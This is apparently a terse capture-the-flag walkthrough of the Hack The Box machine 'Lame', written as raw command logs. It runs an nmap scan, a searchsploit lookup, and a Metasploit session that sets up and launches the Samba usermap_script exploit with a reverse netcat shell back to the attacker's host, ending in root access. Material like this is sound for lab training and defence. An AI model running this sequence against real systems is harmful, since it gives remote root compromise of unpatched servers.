Machine-Name : Lame
IP-Address   : 10.129.35.36

Command-Line: sudo nmap -A 10.129.35.36
Result:
  Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-04 13:09 EST
  Nmap scan report for 10.129.35.36
  Host is up (0.063s latency).
  Not shown: 996 filtered ports
  PORT    STATE SERVICE     VERSION
  21/tcp  open  ftp         vsftpd 2.3.4
  |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | ftp-syst:
  |   STAT:
  | FTP server status:
  |      Connected to 10.10.14.65
  |      Logged in as ftp
  |      TYPE: ASCII
  |      No session bandwidth limit
  |      Session timeout in seconds is 300
  |      Control connection is plain text
  |      Data connections will be plain text
  |      vsFTPd 2.3.4 - secure, fast, stable
  |_End of status
  22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
  | ssh-hostkey:
  |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
  |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
  139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
  Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
  No exact OS matches for host (test conditions non-ideal).
  Network Distance: 2 hops
  Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

  Host script results:
  |_clock-skew: mean: 2h33m38s, deviation: 3h32m10s, median: 3m36s
  | smb-os-discovery:
  |   OS: Unix (Samba 3.0.20-Debian)
  |   Computer name: lame
  |   NetBIOS computer name:
  |   Domain name: hackthebox.gr
  |   FQDN: lame.hackthebox.gr
  |_  System time: 2020-11-04T13:13:31-05:00
  | smb-security-mode:
  |   account_used: <blank>
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: disabled (dangerous, but default)
  |_smb2-time: Protocol negotiation failed (SMB2)

Command-Line: searchsploit Samba 3.0.20
Result:
  -------------------------------------------------------------------------------- -----------------------------
   Exploit Title                                                                  |  Path
  -------------------------------------------------------------------------------- -----------------------------
  Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                          | multiple/remote/10095.txt
  Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit | unix/remote/16320.rb
  Samba < 3.0.20 - Remote Heap Overflow                                           | linux/remote/7701.txt
  Samba < 3.0.20 - Remote Heap Overflow                                           | linux/remote/7701.txt
  Samba < 3.6.2 (x86) - Denial of Service (PoC)                                   | linux_x86/dos/36741.py
  -------------------------------------------------------------------------------- -----------------------------

// Starting Metasploit
Command-Line: msfconsole
Result: Metasploit Start

// Searching Metasploit
msf6 > search Samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 > use 0
Result:
  [*] No payload configured, defaulting to cmd/unix/reverse_netcat
  msf6 exploit(multi/samba/usermap_script) >

msf6 exploit(multi/samba/usermap_script) > show options
Result:
  Module options (exploit/multi/samba/usermap_script):

     Name    Current Setting  Required  Description
     ----    ---------------  --------  -----------
     RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
     RPORT   139              yes       The target port (TCP)


  Payload options (cmd/unix/reverse_netcat):

     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     LHOST  192.168.0.11     yes       The listen address (an interface may be specified)
     LPORT  4444             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Automatic

msf6 > set RHOSTS 10.129.35.36
Result: RHOSTS => 10.129.35.36

msf6 > set LHOST 10.10.14.65
Result: LHOST => 10.10.14.65

msf6 > exploit

**ROOT and USER ACCESS GAINED**
